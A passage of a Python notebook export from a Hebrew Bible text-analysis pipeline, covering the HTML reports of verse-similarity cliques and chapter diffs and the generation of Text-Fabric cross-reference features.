pickle.dump(cliques, f, protocol=PICKLE_PROTOCOL)
meta_clique_post()
TF.info(
"CLIQUES ({} {} {} M>{} S>{}): Composed and saved {:>5} cliques out of {:>6} chunks from {} comparisons".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
len(cliques),
len(passages),
len(similars),
)
)
# ## 5.8 Output
#
# We deliver the output of our experiments in various ways, all in HTML.
#
# We generate chapter based diff outputs with color-highlighted differences between the chapters for every pair of chapters that merit it.
#
# For every (*good*) experiment, we produce a big list of its cliques, and for
# every such clique, we produce a diff-view of its members.
#
# Big cliques will be split into several files.
#
# Clique listings will also contain metadata: the value of the experiment parameters.
#
# ### 5.8.1 Format definitions
# Here are the definitions for formatting the (HTML) output.
# In[16]:
# In[40]:
# clique lists
css = """
td.vl {
font-family: Verdana, Arial, sans-serif;
font-size: small;
text-align: right;
color: #aaaaaa;
width: 10%;
direction: ltr;
border-left: 2px solid #aaaaaa;
border-right: 2px solid #aaaaaa;
}
td.ht {
font-family: Ezra SIL, SBL Hebrew, Verdana, sans-serif;
font-size: x-large;
line-height: 1.7;
text-align: right;
direction: rtl;
}
table.ht {
width: 100%;
direction: rtl;
border-collapse: collapse;
}
td.ht {
border-left: 2px solid #aaaaaa;
border-right: 2px solid #aaaaaa;
}
tr.ht.tb {
border-top: 2px solid #aaaaaa;
border-left: 2px solid #aaaaaa;
border-right: 2px solid #aaaaaa;
}
tr.ht.bb {
border-bottom: 2px solid #aaaaaa;
border-left: 2px solid #aaaaaa;
border-right: 2px solid #aaaaaa;
}
span.m {
background-color: #aaaaff;
}
span.f {
background-color: #ffaaaa;
}
span.x {
background-color: #ffffaa;
color: #bb0000;
}
span.delete {
background-color: #ffaaaa;
}
span.insert {
background-color: #aaffaa;
}
span.replace {
background-color: #ffff00;
}
"""
# In[41]:
# chapter diffs
diffhead = """
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=UTF-8" />
<title></title>
<style type="text/css">
table.diff {
font-family: Ezra SIL, SBL Hebrew, Verdana, sans-serif;
font-size: x-large;
text-align: right;
}
.diff_header {background-color:#e0e0e0}
td.diff_header {text-align:right}
.diff_next {background-color:#c0c0c0}
.diff_add {background-color:#aaffaa}
.diff_chg {background-color:#ffff77}
.diff_sub {background-color:#ffaaaa}
</style>
</head>
"""
# In[42]:
# table of experiments
ecss = """
<style type="text/css">
.mis {background-color: #cccccc;}
.rec {background-color: #aaffaa;}
.dep {background-color: #ffaaaa;}
.dub {background-color: #ffddaa;}
.out {background-color: #ffddff;}
.nor {background-color: #fcfcff;}
.ps {font-weight: normal;}
.mx {font-style: italic;}
.cl {font-weight: bold;}
.lr {font-weight: bold; background-color: #ffffaa;}
p,td {font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: small;}
td {border: 1pt solid #000000; padding: 4pt;}
table {border: 1pt solid #000000; border-collapse: collapse;}
</style>
"""
# In[43]:
legend = """
<table>
<tr><td class="mis">{mis}</td></tr>
<tr><td class="rec">{rec}</td></tr>
<tr><td class="dep">{dep}</td></tr>
<tr><td class="dub">{dub}</td></tr>
<tr><td class="out">{out}</td></tr>
<tr><td class="nor">{nor}</td></tr>
</table>
""".format(
**VALUE_LABELS
)
# ### 5.8.2 Formatting clique lists
# In[17]:
# In[44]:
def xterse_chunk(i):
chunk = chunks[i]
fword = chunk[0]
book = L.u(fword, otype="book")[0]
chapter = L.u(fword, otype="chapter")[0]
return (book, chapter)
# In[45]:
def xterse_clique(ii):
return tuple(sorted({xterse_chunk(i) for i in ii}))
# In[46]:
def terse_chunk(i):
chunk = chunks[i]
fword = chunk[0]
book = L.u(fword, otype="book")[0]
chapter = L.u(fword, otype="chapter")[0]
verse = L.u(fword, otype="verse")[0]
return (book, chapter, verse)
# In[47]:
def terse_clique(ii):
return tuple(sorted({terse_chunk(i) for i in ii}))
# In[48]:
def verse_chunk(i):
(bk, ch, vs) = i
book = F.book.v(bk)
chapter = F.chapter.v(ch)
verse = F.verse.v(vs)
text = "".join(
"{}{}".format(Fs(TEXT_FEATURE).v(w), Fs(TRAILER_FEATURE).v(w))
for w in L.d(vs, otype="word")
)
verse_label = '<td class="vl">{} {}:{}</td>'.format(book, chapter, verse)
htext = '{}<td class="ht">{}</td>'.format(verse_label, text)
return '<tr class="ht">{}</tr>'.format(htext)
# In[49]:
def verse_clique(ii):
return '<table class="ht">{}</table>\n'.format(
"".join(verse_chunk(i) for i in sorted(ii))
)
# In[50]:
def condense(vlabels):
cnd = ""
(cur_b, cur_c) = (None, None)
for (b, c, v) in vlabels:
c = str(c)
v = str(v)
sep = (
""
if cur_b is None
else ". "
if cur_b != b
else "; "
if cur_c != c
else ", "
)
show_b = b + " " if cur_b != b else ""
show_c = c + ":" if cur_b != b or cur_c != c else ""
(cur_b, cur_c) = (b, c)
cnd += "{}{}{}{}".format(sep, show_b, show_c, v)
return cnd
# In[51]:
def print_diff(a, b):
arep = ""
brep = ""
for (lb, ai, aj, bi, bj) in SequenceMatcher(
isjunk=None, a=a, b=b, autojunk=False
).get_opcodes():
if lb == "equal":
arep += a[ai:aj]
brep += b[bi:bj]
elif lb == "delete":
arep += '<span class="{}">{}</span>'.format(lb, a[ai:aj])
elif lb == "insert":
brep += '<span class="{}">{}</span>'.format(lb, b[bi:bj])
else:
arep += '<span class="{}">{}</span>'.format(lb, a[ai:aj])
brep += '<span class="{}">{}</span>'.format(lb, b[bi:bj])
return (arep, brep)
# In[52]:
def print_chunk_fine(prev, text, verse_labels, prevlabels):
if prev is None:
return """
<tr class="ht tb bb"><td class="vl">{}</td><td class="ht">{}</td></tr>
""".format(
condense(verse_labels),
text,
)
else:
(prevline, textline) = print_diff(prev, text)
return """
<tr class="ht tb"><td class="vl">{}</td><td class="ht">{}</td></tr>
<tr class="ht bb"><td class="vl">{}</td><td class="ht">{}</td></tr>
""".format(
condense(prevlabels) if prevlabels is not None else "previous",
prevline,
condense(verse_labels),
textline,
)
# In[53]:
def print_chunk_coarse(text, verse_labels):
return """
<tr class="ht tb bb"><td class="vl">{}</td><td class="ht">{}</td></tr>
""".format(
condense(verse_labels),
text,
)
# In[54]:
def print_clique(ii, ncliques):
return (
print_clique_fine(ii)
if len(ii) < ncliques * DEP_CLIQUE_RATIO / 100
else print_clique_coarse(ii)
)
# In[55]:
def print_clique_fine(ii):
condensed = collections.OrderedDict()
for i in sorted(ii, key=lambda c: (-len(chunks[c]), c)):
chunk = chunks[i]
fword = chunk[0]
book = F.book.v(L.u(fword, otype="book")[0])
chapter = F.chapter.v(L.u(fword, otype="chapter")[0])
verse = F.verse.v(L.u(fword, otype="verse")[0])
text = "".join(
"{}{}".format(Fs(TEXT_FEATURE).v(w), Fs(TRAILER_FEATURE).v(w))
for w in chunk
)
condensed.setdefault(text, []).append((book, chapter, verse))
result = []
nv = len(condensed.items())
prev = None
for (text, verse_labels) in condensed.items():
if prev is None:
if nv == 1:
result.append(print_chunk_fine(None, text, verse_labels, None))
else:
prev = text
prevlabels = verse_labels
continue
else:
result.append(print_chunk_fine(prev, text, verse_labels, prevlabels))
prev = text
prevlabels = None
return '<table class="ht">{}</table>\n'.format("".join(result))
# In[56]:
def print_clique_coarse(ii):
condensed = collections.OrderedDict()
for i in sorted(ii, key=lambda c: (-len(chunks[c]), c))[0:LARGE_CLIQUE_SIZE]:
chunk = chunks[i]
fword = chunk[0]
book = F.book.v(L.u(fword, otype="book")[0])
chapter = F.chapter.v(L.u(fword, otype="chapter")[0])
verse = F.verse.v(L.u(fword, otype="verse")[0])
text = "".join(
"{}{}".format(Fs(TEXT_FEATURE).v(w), Fs(TRAILER_FEATURE).v(w))
for w in chunk
)
condensed.setdefault(text, []).append((book, chapter, verse))
result = []
for (text, verse_labels) in condensed.items():
result.append(print_chunk_coarse(text, verse_labels))
if len(ii) > LARGE_CLIQUE_SIZE:
result.append(
print_chunk_coarse("+ {} ...".format(len(ii) - LARGE_CLIQUE_SIZE), [])
)
return '<table class="ht">{}</table>\n'.format("".join(result))
# In[57]:
def index_clique(bnm, n, ii, ncliques):
return (
index_clique_fine(bnm, n, ii)
if len(ii) < ncliques * DEP_CLIQUE_RATIO / 100
else index_clique_coarse(bnm, n, ii)
)
# In[58]:
def index_clique_fine(bnm, n, ii):
verse_labels = []
for i in sorted(ii, key=lambda c: (-len(chunks[c]), c)):
chunk = chunks[i]
fword = chunk[0]
book = F.book.v(L.u(fword, otype="book")[0])
chapter = F.chapter.v(L.u(fword, otype="chapter")[0])
verse = F.verse.v(L.u(fword, otype="verse")[0])
verse_labels.append((book, chapter, verse))
reffl = "{}_{}".format(bnm, n // CLIQUES_PER_FILE)
return '<p><b>{}</b> <a href="{}.html#c_{}">{}</a></p>'.format(
n,
reffl,
n,
condense(verse_labels),
)
# In[59]:
def index_clique_coarse(bnm, n, ii):
verse_labels = []
for i in sorted(ii, key=lambda c: (-len(chunks[c]), c))[0:LARGE_CLIQUE_SIZE]:
chunk = chunks[i]
fword = chunk[0]
book = F.book.v(L.u(fword, otype="book")[0])
chapter = F.chapter.v(L.u(fword, otype="chapter")[0])
verse = F.verse.v(L.u(fword, otype="verse")[0])
verse_labels.append((book, chapter, verse))
reffl = "{}_{}".format(bnm, n // CLIQUES_PER_FILE)
extra = (
"+ {} ...".format(len(ii) - LARGE_CLIQUE_SIZE)
if len(ii) > LARGE_CLIQUE_SIZE
else ""
)
return '<p><b>{}</b> <a href="{}.html#c_{}">{}{}</a></p>'.format(
n,
reffl,
n,
condense(verse_labels),
extra,
)
# In[60]:
def lines_chapter(c):
lines = []
for v in L.d(c, otype="verse"):
vl = F.verse.v(v)
text = "".join(
"{}{}".format(Fs(TEXT_FEATURE).v(w), Fs(TRAILER_FEATURE).v(w))
for w in L.d(v, otype="word")
)
lines.append("{} {}".format(vl, text.replace("\n", " ")))
return lines
# In[61]:
def compare_chapters(c1, c2, lb1, lb2):
dh = difflib.HtmlDiff(wrapcolumn=80)
table_html = dh.make_table(
lines_chapter(c1),
lines_chapter(c2),
fromdesc=lb1,
todesc=lb2,
context=False,
numlines=5,
)
htext = """<html>{}<body>{}</body></html>""".format(diffhead, table_html)
return htext
# ### 5.8.3 Compiling the table of experiments
#
# Here we generate the table of experiments, complete with the coloring according to their assessments.
# In[18]:
# In[62]:
# generate the table of experiments
def gen_html(standalone=False):
global other_exps
TF.info(
"EXPERIMENT: Generating html report{}".format(
"(standalone)" if standalone else ""
)
)
stats = collections.Counter()
pre = (
"""
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
{}
</head>
<body>
""".format(
ecss
)
if standalone
else ""
)
post = (
"""
</body></html>
"""
if standalone
else ""
)
experiments = """
{}
{}
<table>
<tr><th>chunk type</th><th>chunk size</th><th>similarity method</th>{}</tr>
""".format(
pre, legend, "".join("<th>{}</th>".format(sim_thr) for sim_thr in SIMILARITIES)
)
for chunk_f in (True, False):
if chunk_f:
chunk_items = CHUNK_SIZES
else:
chunk_items = CHUNK_OBJECTS
chunk_lb = CHUNK_LBS[chunk_f]
for chunk_i in chunk_items:
for sim_m in SIM_METHODS:
set_matrix_threshold(sim_m=sim_m, chunk_o=chunk_i)
these_outputs = outputs.get(MATRIX_THRESHOLD, {})
experiments += "<tr><td>{}</td><td>{}</td><td>{}</td>".format(
CHUNK_LABELS[chunk_f],
chunk_i,
sim_m,
)
for sim_thr in SIMILARITIES:
okey = (chunk_lb, chunk_i, sim_m, sim_thr)
values = these_outputs.get(okey)
if values is None:
result = '<td class="mis"> </td>'
stats["mis"] += 1
else:
(npassages, ncliques, longest_clique_len) = values
cls = assess_exp(
chunk_f, npassages, ncliques, longest_clique_len
)
stats[cls] += 1
(lr_el, lr_lb) = ("", "")
if (
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
SIMILARITY_THRESHOLD,
) == (
chunk_lb,
chunk_i,
sim_m,
sim_thr,
):
lr_el = '<span class="lr">*</span>'
lr_lb = VALUE_LABELS["lr"]
result = """
<td class="{}" title="{}">{}
<span class="ps">{}</span><br/>
<a target="_blank" href="{}{}/{}_{}_{}_M{}_S{}.html"><span class="cl">{}</span></a><br/>
<span class="mx">{}</span>
</td>""".format(
cls,
lr_lb,
lr_el,
npassages,
"" if standalone else LOCAL_BASE_OUTP + "/",
EXPERIMENT_DIR,
chunk_lb,
chunk_i,
sim_m,
MATRIX_THRESHOLD,
sim_thr,
ncliques,
longest_clique_len,
)
experiments += result
experiments += "</tr>\n"
experiments += "</table>\n{}".format(post)
if standalone:
with open(EXPERIMENT_HTML, "w") as f:
f.write(experiments)
else:
other_exps = experiments
for stat in sorted(stats):
TF.info("EXPERIMENT: {:>3} {}".format(stats[stat], VALUE_LABELS[stat]))
TF.info("EXPERIMENT: Generated html report")
# ### 5.8.4 High level formatting functions
#
# Here everything concerning output is brought together.
# In[19]:
# In[63]:
def assess_exp(cf, np, nc, ll):
return (
"out"
if cf
else "rec"
if ll > nc * REC_CLIQUE_RATIO / 100 and ll <= nc * DUB_CLIQUE_RATIO / 100
else "dep"
if ll > nc * DEP_CLIQUE_RATIO / 100
else "dub"
if ll > nc * DUB_CLIQUE_RATIO / 100
else "nor"
)
# In[64]:
def printing():
global outputs, bin_cliques, base_name
TF.info(
"PRINT ({} {} {} M>{} S>{}): sorting out cliques".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
)
)
xt_cliques = {
xterse_clique(c) for c in cliques
} # chapter cliques as tuples of (b, ch) tuples
bin_cliques = {
c for c in xt_cliques if len(c) == 2
} # chapter cliques with exactly two chapters
# all chapters that occur in binary chapter cliques
meta["# BINARY CHAPTER DIFFS"] = len(bin_cliques)
# We generate one kind of info for binary chapter cliques (the majority of cases).
# The remaining cases are verse cliques that do not occur in such chapters, e.g. because they
# have member chunks in the same chapter, or in multiple (more than two) chapters.
ncliques = len(cliques)
chapters_ok = assess_exp(CHUNK_FIXED, len(passages), ncliques, l_c_l) in {
"rec",
"nor",
"dub",
}
cdoing = "involving" if chapters_ok else "skipping"
TF.info(
"PRINT ({} {} {} M>{} S>{}): formatting {} cliques {} {} binary chapter diffs".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
ncliques,
cdoing,
len(bin_cliques),
)
)
meta_html = "\n".join("{:<40} : {:>10}".format(k, str(meta[k])) for k in meta)
base_name = "{}_{}_{}_M{}_S{}".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
)
param_spec = """
<table>
<tr><th>chunking method</th><td>{}</td></tr>
<tr><th>chunking description</th><td>{}</td></tr>
<tr><th>similarity method</th><td>{}</td></tr>
<tr><th>similarity threshold</th><td>{}</td></tr>
</table>
""".format(
CHUNK_LABELS[CHUNK_FIXED],
CHUNK_DESC,
SIMILARITY_METHOD,
SIMILARITY_THRESHOLD,
)
param_lab = "chunk-{}-{}-sim-{}-m{}-s{}".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
)
index_name = base_name
all_name = "{}_{}".format("all", base_name)
cliques_name = "{}_{}".format("clique", base_name)
clique_links = []
clique_links.append(
("{}/{}.html".format(base_name, all_name), "Big list of all cliques")
)
nexist = 0
nnew = 0
if chapters_ok:
chapter_diffs = []
TF.info(
"PRINT ({} {} {} M>{} S>{}): Chapter diffs needed: {}".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
len(bin_cliques),
)
)
bcc_text = "<p>These results look good, so a binary chapter comparison has been generated</p>"
for cl in sorted(bin_cliques):
lb1 = "{} {}".format(F.book.v(cl[0][0]), F.chapter.v(cl[0][1]))
lb2 = "{} {}".format(F.book.v(cl[1][0]), F.chapter.v(cl[1][1]))
hfilename = "{}_vs_{}.html".format(lb1, lb2).replace(" ", "_")
hfilepath = "{}/{}/{}".format(LOCAL_BASE_OUTP, CHAPTER_DIR, hfilename)
chapter_diffs.append(
(
lb1,
cl[0][1],
lb2,
cl[1][1],
"{}/{}/{}/{}".format(
SHEBANQ_TOOL,
LOCAL_BASE_OUTP,
CHAPTER_DIR,
hfilename,
),
)
)
if not os.path.exists(hfilepath):
htext = compare_chapters(cl[0][1], cl[1][1], lb1, lb2)
with open(hfilepath, "w") as f:
f.write(htext)
if VERBOSE:
TF.info(
"PRINT ({} {} {} M>{} S>{}): written {}".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
hfilename,
)
)
nnew += 1
else:
nexist += 1
clique_links.append(
(
"../{}/{}".format(CHAPTER_DIR, hfilename),
"{} versus {}".format(lb1, lb2),
)
)
TF.info(
"PRINT ({} {} {} M>{} S>{}): Chapter diffs: {} newly created and {} already existing".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
nnew,
nexist,
)
)
else:
bcc_text = "<p>These results look dubious at best, so no binary chapter comparison has been generated</p>"
allgeni_html = (
index_clique(cliques_name, i, c, ncliques) for (i, c) in enumerate(cliques)
)
allgen_htmls = []
allgen_html = ""
for (i, c) in enumerate(cliques):
if i % CLIQUES_PER_FILE == 0:
if i > 0:
allgen_htmls.append(allgen_html)
allgen_html = ""
allgen_html += '<h3><a name="c_{}">Clique {}</a></h3>\n{}'.format(
i, i, print_clique(c, ncliques)
)
allgen_htmls.append(allgen_html)
index_html_tpl = """
{}
<h1>Binary chapter comparisons</h1>
{}
{}
"""
content_file_tpl = """<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>{}</title>
<style type="text/css">
{}
</style>
</head>
<body>
<h1>{}</h1>
{}
<p><a href="#meta">more parameters and stats</a></p>
{}
<h1><a name="meta">Parameters and stats</a></h1>
<pre>{}</pre>
</body>
</html>"""
a_tpl_file = '<p><a target="_blank" href="{}">{}</a></p>'
index_html_file = index_html_tpl.format(
a_tpl_file.format(*clique_links[0]),
bcc_text,
"\n".join(a_tpl_file.format(*c) for c in clique_links[1:]),
)
listing_html = "{}\n".format(
"\n".join(allgeni_html),
)
for (subdir, fname, content_html, tit) in (
(None, index_name, index_html_file, "Index " + param_lab),
(base_name, all_name, listing_html, "Listing " + param_lab),
(base_name, cliques_name, allgen_htmls, "Cliques " + param_lab),
):
subdir = "" if subdir is None else (subdir + "/")
subdirabs = "{}/{}/{}".format(LOCAL_BASE_OUTP, EXPERIMENT_DIR, subdir)
if not os.path.exists(subdirabs):
os.makedirs(subdirabs)
if type(content_html) is list:
for (i, c_h) in enumerate(content_html):
fn = "{}_{}".format(fname, i)
t = "{}_{}".format(tit, i)
with open(
"{}/{}/{}{}.html".format(
LOCAL_BASE_OUTP, EXPERIMENT_DIR, subdir, fn
),
"w",
) as f:
f.write(
content_file_tpl.format(t, css, t, param_spec, c_h, meta_html)
)
else:
with open(
"{}/{}/{}{}.html".format(
LOCAL_BASE_OUTP, EXPERIMENT_DIR, subdir, fname
),
"w",
) as f:
f.write(
content_file_tpl.format(
tit, css, tit, param_spec, content_html, meta_html
)
)
destination = outputs.setdefault(MATRIX_THRESHOLD, {})
destination[(CHUNK_LB, CHUNK_DESC, SIMILARITY_METHOD, SIMILARITY_THRESHOLD)] = (
len(passages),
len(cliques),
l_c_l,
)
TF.info(
"PRINT ({} {} {} M>{} S>{}): formatted {} cliques ({} files) {} {} binary chapter diffs".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
len(cliques),
len(allgen_htmls),
cdoing,
len(bin_cliques),
)
)
# ## 5.9 Running experiments
#
# The workflows of doing a single experiment, and then all experiments, are defined.
# In[20]:
# In[65]:
outputs = {}
# In[66]:
def writeoutputs():
global outputs
with open(EXPERIMENT_PATH, "wb") as f:
pickle.dump(outputs, f, protocol=PICKLE_PROTOCOL)
# In[67]:
def readoutputs():
global outputs
if not os.path.exists(EXPERIMENT_PATH):
outputs = {}
else:
with open(EXPERIMENT_PATH, "rb") as f:
outputs = pickle.load(f)
# In[68]:
def do_experiment(chunk_f, chunk_i, sim_m, sim_thr, do_index):
if do_index:
readoutputs()
(do_chunk, do_prep, do_sim, do_clique, skip) = do_params(
chunk_f, chunk_i, sim_m, sim_thr
)
if skip:
return
chunking(do_chunk)
preparing(do_prep)
similarity(do_sim)
cliqueing(do_clique)
printing()
if do_index:
writeoutputs()
gen_html()
# In[69]:
def do_only_chunk(chunk_f, chunk_i):
do_chunk = do_params_chunk(chunk_f, chunk_i)
chunking(do_chunk)
# In[70]:
def reset_experiments():
global outputs
readoutputs()
outputs = {}
reset_params()
writeoutputs()
gen_html()
# In[71]:
def do_all_experiments(no_fixed=False, only_object=None):
global outputs
reset_experiments()
for chunk_f in (False,) if no_fixed else (True, False):
if chunk_f:
chunk_items = CHUNK_SIZES
else:
chunk_items = CHUNK_OBJECTS if only_object is None else (only_object,)
for chunk_i in chunk_items:
for sim_m in SIM_METHODS:
for sim_thr in SIMILARITIES:
do_experiment(chunk_f, chunk_i, sim_m, sim_thr, False)
writeoutputs()
gen_html()
gen_html(standalone=True)
# In[72]:
def do_all_chunks(no_fixed=False, only_object=None):
global outputs
reset_experiments()
for chunk_f in (False,) if no_fixed else (True, False):
if chunk_f:
chunk_items = CHUNK_SIZES
else:
chunk_items = CHUNK_OBJECTS if only_object is None else (only_object,)
for chunk_i in chunk_items:
do_only_chunk(chunk_f, chunk_i)
# In[73]:
def show_all_experiments():
readoutputs()
gen_html()
gen_html(standalone=True)
# # 6a
# # TF features
#
# Based on selected similarity matrices, we produce an
# edge features between verses, containing weighted links to parallel verses.
#
# The features to deliver are called `crossrefSET` and `crossrefLCS` and `crossref`.
#
# These are edge feature, both are symmetric, and hence redundant.
# For every node, the *from* and *to* edges are identical.
#
# The `SET` variant consists of set based similarity, the `LCS` one on longest common subsequence
# similarity.
#
# The `crossref` feature takes the union of both methods, with the average confidence.
#
# The weight is the similarity as percentage integer as it comes from the similarity matrix.
#
# ## Discussion
# We only produce the results of the similarity computation (the matrix), we do not do the cliqueing.
# There are many ways to make cliques, and that can easily be done by users of the data, once the
# matrix results are in place.
# We also do not produce pretty outputs, chapter diffs and other goodies.
# Just the raw similarity data.
#
# The matrix computation is expensive.
# We use fixed settings:
# * verse chunks
# * `SET` method / `LCS` method,
# * matrix threshold 50 / 60
# * similarity threshold 75
#
# That is, we compute a matrix that contains all pairs with similarity above 50 or 60
# depending on whether we do the `SET` method or the `LCS` method.
#
# From that matrix, we only use the similarities above 75.
# This gives us room to play without recomputing the matrix.
#
# We do not want to redo this computation if it can be avoided.
#
# Verse similarity is not something that is very sensitive to change in the encoding.
# It is very likely that similar verses in one version of the data agree with similar
# verses in all other versions.
#
# However, the node numbers of verses may change from version to version, so that part
# must be done again for each version.
#
# This is how we proceed:
# * the matrix computation gives us triples (v1, v2, w), where v1, v2 are verse nodes and d is there similarity
# * we store the result of the matrix computation in a csv file with the following fields:
# * method, v1, v1Ref, v2, v2Ref, d, where v1Ref and v2Ref are verse references,
# each containing exactly 3 fields: book, chapter, verse
# * NB: the similarity table has only one entry for each pair of similar verses per method.
# If (v1, v2) is in the table, (v2, v1) is not in the table, per method.
#
# When we run this notebook for the pipeline, we check for the presence of this file.
# If it is present, we uses the vRefs in it to compute the verse nodes that are valid for the
# version we are going to produce.
# That gives us all the data we need, so we can skip the matrix computation.
#
# If the file is not present, we have to compute the matrix.
# There will be a parameter, called FORCE_MATRIX, which can enforce a re-computation of the matrix.
# We need some utility function geared to TF feature production.
# The `get_verse()` function is simpler, and we do not have to run full experiments.
# In[21]:
# In[74]:
def writeSimTable(similars):
with open(TF_TABLE, "w") as h:
for entry in similars:
h.write("{}\n".format("\t".join(str(x) for x in entry)))
# In[75]:
def readSimTable():
similars = []
stats = set()
with open(TF_TABLE) as h:
for line in h:
(
method,
v1,
v2,
sim,
book1,
chapter1,
verse1,
book2,
chapter2,
verse2,
) = line.rstrip("\n").split("\t")
verseNode1 = T.nodeFromSection((book1, int(chapter1), int(verse1)))
verseNode2 = T.nodeFromSection((book2, int(chapter2), int(verse2)))
if verseNode1 != int(v1):
stats.add(verseNode1)
if verseNode2 != int(v2):
stats.add(verseNode2)
similars.append(
(
method,
verseNode1,
verseNode2,
int(sim),
book1,
int(chapter1),
int(verse1),
book2,
int(chapter2),
int(verse2),
)
)
nStats = len(stats)
if nStats:
utils.caption(
0,
"\t\tINFO: {} verse nodes have been changed between versions".format(
nStats
),
)
utils.caption(0, "\t\tINFO: We will save and use the recomputed ones")
writeSimTable(similars)
else:
utils.caption(
0, "\t\tINFO: All verse nodes are the same as in the previous version"
)
return similars
# In[76]:
def makeSimTable():
similars = []
for (method, similarityCutoff) in (
("SET", 75),
("LCS", 75),
):
(do_chunk, do_prep, do_sim, do_clique, skip) = do_params(
False, "verse", method, similarityCutoff
)
chunking(do_chunk)
preparing(do_prep)
similarity(do_sim or FORCE_MATRIX)
theseSimilars = []
for ((chunk1, chunk2), sim) in sorted(
(x, d) for (x, d) in chunk_dist.items() if d >= similarityCutoff
):
verseNode1 = L.u(chunks[chunk1][0], otype="verse")[0]
verseNode2 = L.u(chunks[chunk2][0], otype="verse")[0]
simInt = int(round(sim))
heading1 = T.sectionFromNode(verseNode1)
heading2 = T.sectionFromNode(verseNode2)
theseSimilars.append(
(method, verseNode1, verseNode2, simInt, *heading1, *heading2)
)
utils.caption(
0,
"\tMethod {}: found {} similar pairs of verses".format(
method, len(theseSimilars)
),
)
similars.extend(theseSimilars)
writeSimTable(similars)
return similars
# In[22]:
# In[77]:
utils.caption(4, "CROSSREFS: Fetching crossrefs")
# In[78]:
xTable = os.path.exists(TF_TABLE)
if FORCE_MATRIX:
utils.caption(
0,
"\t{} requested of {}".format(
"Recomputing" if xTable else "computing",
TF_TABLE,
),
)
else:
if xTable:
utils.caption(0, "\tReading existing {}".format(TF_TABLE))
else:
utils.caption(0, "\tComputing missing {}".format(TF_TABLE))
# In[79]:
if FORCE_MATRIX or not xTable:
similars = makeSimTable()
else:
similars = readSimTable()
# In[23]:
# In[80]:
if not SCRIPT:
print("\n".join(sorted(repr(sim) for sim in similars if sim[0] == "LCS")[0:10]))
print("\n".join(sorted(repr(sim) for sim in similars if sim[0] == "SET")[0:10]))
# In[81]:
crossrefData = {}
otherMethod = dict(LCS="SET", SET="LCS")
# In[82]:
for (method, v1, v2, sim, *x) in similars:
crossrefData.setdefault(method, {}).setdefault(v1, {})[v2] = sim
crossrefData.setdefault(method, {}).setdefault(v2, {})[v1] = sim
omethod = otherMethod[method]
otherSim = crossrefData.get(omethod, {}).get(v1, {}).get(v2, None)
thisSim = sim if otherSim is None else int(round((otherSim + sim) / 2))
crossrefData.setdefault("", {}).setdefault(v1, {})[v2] = thisSim
crossrefData.setdefault("", {}).setdefault(v2, {})[v1] = thisSim
# # Generating parallels module for Text-Fabric
#
# We generate the feature `crossref`.
# It is an edge feature between verse nodes, with the similarity as weight.
# In[89]:
utils.caption(4, "Writing TF parallel features")
# In[90]:
newFeatureStr = "crossref crossrefSET crossrefLCS"
newFeatures = newFeatureStr.strip().split()
# In[91]:
genericMetaPath = f"{thisRepo}/yaml/generic.yaml"
parallelsMetaPath = f"{thisRepo}/yaml/parallels.yaml"
with open(genericMetaPath) as fh:
genericMeta = yaml.load(fh, Loader=yaml.FullLoader)
genericMeta["version"] = VERSION
with open(parallelsMetaPath) as fh:
parallelsMeta = formatMeta(yaml.load(fh, Loader=yaml.FullLoader))
metaData = {"": genericMeta, **parallelsMeta}
# In[92]:
nodeFeatures = dict()
edgeFeatures = dict()
for method in [""] + list(otherMethod):
edgeFeatures["crossref{}".format(method)] = crossrefData[method]
# In[93]:
for newFeature in newFeatures:
metaData[newFeature]["valueType"] = "int"
metaData[newFeature]["edgeValues"] = True
# In[94]:
TF = Fabric(locations=thisTempTf, silent=True)
TF.save(nodeFeatures=nodeFeatures, edgeFeatures=edgeFeatures, metaData=metaData)
# # Generating simple crossref notes for SHEBANQ
# We base them on the average of both methods, we supply the confidence.
# In[33]:
# In[ ]:
MAX_REFS = 10
# In[ ]:
def condenseX(vlabels):
cnd = []
(cur_b, cur_c) = (None, None)
for (b, c, v, d) in vlabels:
sep = (
""
if cur_b is None
else ". "
if cur_b != b
else "; "
if cur_c != c
else ", "
)
show_b = b + " " if cur_b != b else ""
show_c = str(c) + ":" if cur_b != b or cur_c != c else ""
(cur_b, cur_c) = (b, c)
cnd.append("{}[{}{}{}{}]".format(sep, show_b, show_c, v, d))
return cnd
# In[ ]:
crossrefBase = crossrefData[""]
# In[ ]:
refsGrouped = []
nCrossrefs = 0
for (x, refs) in crossrefBase.items():
vys = sorted(refs.keys())
nCrossrefs += len(vys)
currefs = []
for vy in vys:
nr = len(currefs)
if nr == MAX_REFS:
refsGrouped.append((x, tuple(currefs)))
currefs = []
currefs.append(vy)
if len(currefs):
refsGrouped.append((x, tuple(currefs)))
# In[33]:
refsCompiled = []
for (x, vys) in refsGrouped:
vysd = [
(*T.sectionFromNode(vy, lang="la"), " ~{}%".format(crossrefBase[x][vy]))
for vy in vys
]
vysl = condenseX(vysd)
these_refs = []
for (i, vy) in enumerate(vysd):
link_text = vysl[i]
link_target = "{} {}:{}".format(vy[0], vy[1], vy[2])
these_refs.append("{}({})".format(link_text, link_target))
refsCompiled.append((x, " ".join(these_refs)))
utils.caption(
0,
